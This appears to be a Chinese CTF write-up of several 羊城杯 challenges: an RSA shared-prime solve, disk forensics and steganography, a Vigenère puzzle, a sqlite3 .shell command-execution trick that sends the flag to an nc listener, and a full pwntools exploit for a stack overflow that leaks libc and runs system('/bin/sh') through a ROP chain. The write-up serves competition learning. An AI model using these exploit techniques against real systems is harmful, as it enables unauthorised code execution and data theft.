本文来自“白帽子社区知识星球”
easyrsa
题目
from flag import flag
from Crypto.Util.number import *
# Challenge script (Python 2 syntax in the original listing): the flag is
# RSA-encrypted once per modulus listed in output.txt, each layer's ciphertext
# becoming the next layer's "message", and only the final value is printed.
# The public exponent is the same for every layer.
m = bytes_to_long(flag)
e = 65537

with open("output.txt", "r") as f:
    moduli = f.readlines()

# Chain the encryptions in file order.  The moduli in output.txt share a prime
# factor (see the gcd computed in the solve script), which is what makes this
# chain reversible by an attacker.
for line in moduli:
    m = pow(m, e, int(line))

print('c = %s' % (m))
'''
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
'''
分析
1、output 文件中的每个数依次作为模数 n 参与计算,上一层的密文作为下一层的明文继续加密,最终只输出最后一层的 c;因此解密时必须按相反的顺序逐层还原。
2、对 output 文件中的所有模数求 gcd,得到它们共有的素因子 p——说明生成密钥时复用了同一个素数。由此每个 n 都可按 q = n / p 分解,进而算出各自的私钥 d,从最后一层的 c 开始逐层解密得到明文。
解题
import math

import gmpy2
from Crypto.Util.number import *
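# The twelve RSA moduli from output.txt (one per line), in file order.  The
# challenge encrypts the flag with each of them in turn, so every one has to be
# factored to peel the layers back off.
moduli = (
    65439077968397540989065489337415940784529269429684649365065378651353483030304843439003949649543376311871845618819107350646437252980144978447924976470943930075812834237368425374578215977641265884859875440799334807607478705932175148673160353577875890074101393042506714001617338265284910381849259298772642190619,
    86843235426823545017422014398916780909062053456790256392304973548517489132984667679637386416948409930796162377844525829968317585749956057149930523547463230147376192820753802868362225137830225967953826475779047454555958271846035526319036389127587352017149417549187850782892924691511398536178090031958365483499,
    57839320383142814687522363258949714784622321678585619281948174372461045134361003939684803510572969567182690634502610963365500727981041136988638273942465134797850643121827808482673619534240872593224537996099454035648829692386918230535360101064254854063175494150147494342652670585674593236663514793256521719547,
    52668168898129361356420333177679019946307853075463961068071790653159090226904625885080236174231665178538405547828768043706515464922611051221394704678558922339886480247663138702481349098077291584992082414494275463670330534613607852999291645500391111597009868188974671249118213040057429113174377610094956993269,
    79875848044631194160351918105738804229446748736206976033243436373010695259945613104837645712048695514204494137005015770637421510392760763371639480133851920449252506525423837434811693638210458851990502785655738042348115385964604080872180121543147063180945532713593712726527002909054818485584237993215139630243,
    73100501797447180147684637554796375398455002202770022931512541062214916136294604754404667725341796896161398464327153718845280194035978972665664657052946003418121755545770123205426883869361411412259838522099085901563107814985172942977520233320215882707710717870398128412272218474014381169303848087621856187879,
    89149546555397759430343098936690138982544367561661914051499112345535238108800665531588376806546499374457634397161670140520060064963391826220177798442707381640723248034061313974522233415815795656570220902974484865176728535660627712374835329967608728216749734529761431592345816592875807318876347151421393671763,
    66449107450661172442868032153863675098235855689218695279414435182923510356012957155941548483160873271040452368644926703812707864779900715051152673705082002761445847561495295455460041902473282731259268870375921215589157288622757488879539441498396276257589120302991242300378364101246448094955634459779361686643,
    79694880331320743031437708811856697413105291652061062223857313580221562305807771003185061831752133665835648647560103986928466217390444724672894866216636981793418219455653595717274553950715056120806463449033181486699963584346517910081706586345546292894426402568226579894766693070066214488743160957135286739213,
    70521001788476157145543175674209083194325853388116385624440232036679708917857095748070597575068955423165296665429648694541353249787337464272095260410717659726012806836884799476995758902361678737968193674368688353935424186389207123637734230550266810766585903134004322848985320790788169777840924595645463787189,
    51801430118171456966246071852561156183140136541960623661080056673664466785669585092926482194691254461430866302262960624015915371927788809661387318097968209364907625599562339722700041444342116899266802018340155635959614677597708758012024981583143521259152639480003228924151971208695043251548758407218187895663,
    87310111118839703578797261862424304499548882114635944516216618095145194843718635007052242072452831460162126955481326379219639313067967998826898344673513019946299427614605216960081461930080199023399060417820769438661351988322185620598552697590115678078498754112860310272842870106790357443602405008865116282919,
)

# Weak key generation: the moduli were all built from the same prime, so a
# plain gcd across them leaks that prime (p) and each n factors as p * (n // p).
# This is the classic "shared factor" failure that batch-GCD scans of public
# key corpora find in the wild.  Pairwise gcd in a loop keeps this working on
# Python versions whose math.gcd only takes two arguments.
common_factor = moduli[0]
for n in moduli[1:]:
    common_factor = math.gcd(common_factor, n)

# A gcd of 1 means the moduli share no prime and this attack simply does not
# apply; fail loudly rather than feed a bogus "factor" to the decryption step.
if common_factor == 1:
    raise ValueError("moduli share no common prime factor; gcd attack does not apply")

print(common_factor)
e = 65537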
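# Prime shared by every modulus in output.txt (the gcd computed above).
SHARED_PRIME = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897


def _modinv(a, m):
    """Return a^-1 mod m via the extended Euclidean algorithm.

    Raises:
        ValueError: if ``a`` and ``m`` are not coprime (no inverse exists).
    """
    old_r, r = a, m
    old_s, s = 1, 0
    while r:
        quotient = old_r // r
        old_r, r = r, old_r - quotient * r
        old_s, s = s, old_s - quotient * s
    if old_r != 1:
        raise ValueError("no modular inverse: gcd(%d, %d) = %d" % (a, m, old_r))
    return old_s % m


def slov(n, c, p=SHARED_PRIME, e=65537):
    """Decrypt one RSA layer given a known prime factor of the modulus.

    With ``p`` known, ``q = n // p`` and phi(n) = (p-1)(q-1) follow directly,
    so the private exponent is just e^-1 mod phi(n).

    Args:
        n: RSA modulus; must be divisible by ``p``.
        c: ciphertext for this layer, as an integer.
        p: known prime factor of ``n``; defaults to the prime the twelve
            challenge moduli share.
        e: public exponent used for this layer.

    Returns:
        The plaintext integer ``c ** d mod n``.

    Raises:
        ValueError: if ``p`` does not divide ``n`` (wrong factor for this
            modulus), or if ``e`` is not invertible modulo phi(n).
    """
    # A non-dividing "factor" would silently produce garbage plaintext.
    if n % p:
        raise ValueError("p does not divide n; wrong factor for this modulus")
    q = n // p
    phi = (p - 1) * (q - 1)
    d = _modinv(e, phi)
    return pow(c, d, n)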
# output.txt lists the moduli in encryption order; decryption has to undo the
# layers in reverse, so walk the list back to front.
with open('output.txt', 'r') as f1:
    layers = [line for line in f1]

# Final ciphertext printed by the challenge script.
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
for layer in reversed(layers):
    c = slov(int(layer), c)

print(long_to_bytes(c))
结果
7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
b'GWHT{gixkJl7SJTcpLOL9zqwo}'
迷失幻境
通过DiskGenius加载附件,可以看到在迷失幻境目录下有好多图片,全部提取出来。
发现数字命名的图片全都一样
在附件vmdk镜像里的回收站中发现了一些文件
将其提出来。
其中$RE4UUGI.jpg发现与迷失幻境目录里的哒哒哒.jpg显示的内容一样。用Stegsolve查看,发现$RE4UUGI.jpg存在隐写。
用010editor查看$RJ3JGVF,发现为png文件的主体部分,缺少了文件头。
补齐文件头,得到一张和幻境一样的图片。
使用Stegsolve查看,发现key。
再使用 outguess 从 $RE4UUGI.jpg 中提取隐藏数据(应即以上一步得到的 key 作为密钥),就可以得到 flag 文件了
where_is_secret
打开附件,发现一个压缩包和一个文本。
打开文本:
Naseu bybkjkl, O wt mna Wkkopwkja hl Qrkgeux Fasxtorr. Zdl Kaozbgj hksu oty fblz hhntyoxj wu tzphvq ku Nqnhbta, hgj pox Qupo geyiuna ago ixkj jhtpyhrhlw hu aak Nblyehg gntr. Nahkj pvwgu pl QBJ Vxwgr Zdbkyzhr, O jlxj ovfkkux zk ikojn fk 29.94 bpgmay-layrbtc vkocpggh jaoyrxt wz kgpphto uhc. Soxt E yxvas mna Ynyoptt wyfe, E dbrh pgbeax ekb mu yvfk pv Nqnhbta ah ha aak rpvk lyxyekxtp.aak lhlysvkj ez ZCDA@K1tz0frjo
推断为维吉尼亚(Vigenère)加密,使用在线工具爆破密钥:
得到password:GWHT@R1nd0yyds
解压出来后是一张图片
根据官方提示,
from PIL import Image
import math
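def encode(text):
    """Pack *text* into a square RGB image, one character per pixel.

    Each character's code point is split into two bytes: the high byte goes
    in the green channel and the low byte in the blue channel; red stays 0.
    Pixels are filled left-to-right, top-to-bottom.  Code points above 0xFFFF
    do not fit in two bytes and are truncated by the mask (GBK-decoded text
    should stay within the BMP, so this does not bite here).

    Args:
        text: the string to hide.

    Returns:
        A PIL ``Image`` of size ``width x width`` with
        ``width = ceil(sqrt(len(text)))``.
    """
    str_len = len(text)
    width = math.ceil(str_len ** 0.5)
    im = Image.new("RGB", (width, width), 0x0)
    # NOTE(review): this assignment and the putpixel call below were mangled
    # in the published listing and have been restored from the decoder's
    # getpixel((x, y)) access pattern.
    x, y = 0, 0
    for i in text:
        index = ord(i)
        rgb = (0, (index & 0xFF00) >> 8, index & 0xFF)
        im.putpixel((x, y), rgb)
        # Wrap to the next row once the current one is full.
        if x == width - 1:
            x = 0
            y += 1
        else:
            x += 1
    return im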
if __name__ == '__main__':
    # The source text is GBK-encoded; decode it to str so ord() sees code points.
    with open("829962.txt", encoding="gbk") as source:
        hidden_text = source.read()
    encode(hidden_text).save("out.bmp")
按加密脚本逆向还原:每个像素的 G 通道存的是字符码的高 8 位,B 通道存低 8 位,R 通道恒为 0,按 (G << 8) | B 还原每个字符即可得到一篇文章。
import string
from PIL import Image
import math
from Crypto.Util.number import *
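# Reverse of encode(): read the square image back into the original text.
# The encoder stored each code point as (R=0, G=high byte, B=low byte), so the
# channel order matters here; reading t[0] would yield only zeros.
im = Image.open('out.bmp')
width = im.size[0]

# Assumes a square RGB image written by encode() (3-tuple pixels); the
# width x width scan would presumably raise on a non-square file.
chars = []
for y in range(width):
    for x in range(width):
        t = im.getpixel((x, y))
        chars.append(chr((t[1] << 8) + t[2]))
# Join once instead of growing a str in the loop (quadratic on large images).
r = ''.join(chars)
print(r)

# Blank out everything that cannot appear in a flag so the fragments stand out
# visually; the pieces still have to be joined by hand (see the flag below).
FLAG_CHARS = frozenset(string.ascii_letters + '0123456789{-_}')
print(''.join(ch if ch in FLAG_CHARS else ' ' for ch in r), end='')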
发现里面存在了一些英文字母
自己拼接下,得到了flag
flag{h1d3_1n_th3_p1ctur3}
YCBSQL-v4
拿到题目后,把sqlite3文件丢到IDA里面
1.判断环境变量
2.然后做了一些初始化的检查
然后就是一些循环看我们输入的参数,然后执行一些操作
本地运行的时候输入 .help 可以查看到命令帮助
可以看到下面有个 .shell 命令:sqlite3 交互式 shell 的 .shell/.system 会直接以当前进程的权限执行操作系统命令,所以只要能让服务端用这个 sqlite3 执行我们提交的 .sql 文件,就等于拿到了命令执行。
所以想到在 .sql 文件中写入一条 .shell 命令(原文此处为截图,命令内容未保留),让目标把 flag 回连发送出来,
然后服务器用 nc 监听
可以看到flag被成功发送过来了
FakeNoOutput-v2
拿到题目后把fakeNoOutput丢到IDA
程序实现了一个简单的http解析
程序首先初始化,然后给s都写上0
使用fgets输入到s中,输入失败调用 response函数,并传入400
Responce 函数负责构造并发送 HTTP 响应体(状态码由参数传入)
Init函数设置缓冲区,然后给s2写上0x110个0,然后,在里面写上随机值
后面就是对相关http协议的字段对相应变量设置
这里如果sub_80497C4函数返回真就会进入 sub_8049E63 函数
我们看该函数的upload函数
这里 strcpy 把 haystack 中的数据拷贝到栈上的定长缓冲区,而 haystack 完全由我们的请求体控制(未见长度检查),因此存在栈溢出。注意 strcpy 遇到 0x00 即停止拷贝,所以 payload(包括 ROP 链里的地址)中间不能出现 0x00 字节。
前面有个 while 循环,只要我们跳出那个循环走到下面,就可以到strcpy函数,所以我们在content 里面加一个 filename=
前面的content-length可以给size赋值
Responce 200 的地方可以传个地址进去泄露libc
from pwn import *
from time import sleep
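context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'

# libc = ELF("./libc.so.6")
sh = process('./fakeNoOutput')
# sh = remote('tcp.dasc.buuoj.cn', 27898)
elf = ELF('./fakeNoOutput')
libc = elf.libc  # local libc; swap in the target's libc when going remote

ru = lambda x, drop=False: sh.recvuntil(x, drop)
sn = lambda x: sh.send(x)
rl = lambda: sh.recvline()
sl = lambda x: sh.sendline(x)
rv = lambda x: sh.recv(x)
sa = lambda a, b: sh.sendafter(a, b)
sla = lambda a, b: sh.sendlineafter(a, b)

# GOT slot whose contents are echoed back through the 200 response to leak a
# libc pointer.  (The original listing called this strspn_got; it is in fact
# __libc_start_main's slot.)
libc_start_main_got = elf.got["__libc_start_main"]
res200 = 0x080496A1      # Responce(200, ...) call site used as the leak primitive
main_addr = 0x80492e0    # return here after the leak to get a second overflow
bss = 0x0805D3C0         # writable scratch area that will hold "/bin/sh"

# Request that reaches the upload handler: Content-Length feeds `size`, and
# the `filename=` token ends the preceding while loop so strcpy is reached.
# The header/body separator was printed as "rnContent" in the listing (the
# backslashes were lost); restored here as \r\n.
payload0 = b"""get /upload head
HTTP_SERVER1_token:taaaa
User-Agent:tcccc
Cookie:tdddd
Referer:teeee
Content-Length:t5600
\r\nContent:filename="""
payload0 += b'a' * 600

# Debug aid: break right at the strcpy.  Remove both lines for the remote run.
gdb.attach(sh, 'b *0x8049FEC')
pause()
sl(payload0)

# Stage 1: 4164 bytes of padding reach the saved return address; return into
# Responce(200) with the GOT slot as its argument so the reply carries the
# libc pointer, then return to main for a second pass.  strcpy stops at 0x00,
# so no address in the chain may contain a zero byte.
payload = b"A" * 4164 + p32(res200)
payload += p32(main_addr)
payload += p32(libc_start_main_got)
payload = payload.ljust((5000 - 18), b"B")  # pad to the fixed length the original used
sn(payload)

# The leaked 32-bit libc pointer's top byte is 0xf7 (typical libc mapping on
# i386), which is the last byte on the wire in little-endian order, so read
# up to it and take the preceding four bytes.  (Listing read "xf7"; the
# backslash has been restored.)
res = ru(b"\xf7")
libc_start_main = u32(res[-4:])
log.info("----------------------" + hex(libc_start_main))
libcbase = libc_start_main - libc.sym["__libc_start_main"]
system_libc = libcbase + libc.sym["system"]
gets_libc = libcbase + libc.sym["gets"]
log.info("----------------------" + hex(libcbase))
log.info("----------------------" + hex(gets_libc))

# Stage 2: same overflow again.  gets(bss) reads the command string into
# .bss, the gadget at 0x08049539 (presumably a pop; ret — verify in the
# binary) discards gets' argument, then system(bss) runs it.
sl(payload0)
payload = b"A" * 4164 + p32(gets_libc)
payload += p32(0x08049539)
payload += p32(bss)
payload += p32(system_libc)
payload += p32(0xbeefbeef)   # fake return address for system; not expected to be used
payload += p32(bss)
payload = payload.ljust((5000 - 18), b"B")
sn(payload)

# Give the target time to reach gets() before feeding it the command string.
# The NUL terminator was printed as "x00" in the listing; restored as \x00.
sleep(5)
sl(b"/bin/sh\x00")
sh.interactive()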
原文始发于微信公众号(白帽子社区):羊城杯CTF 题目wp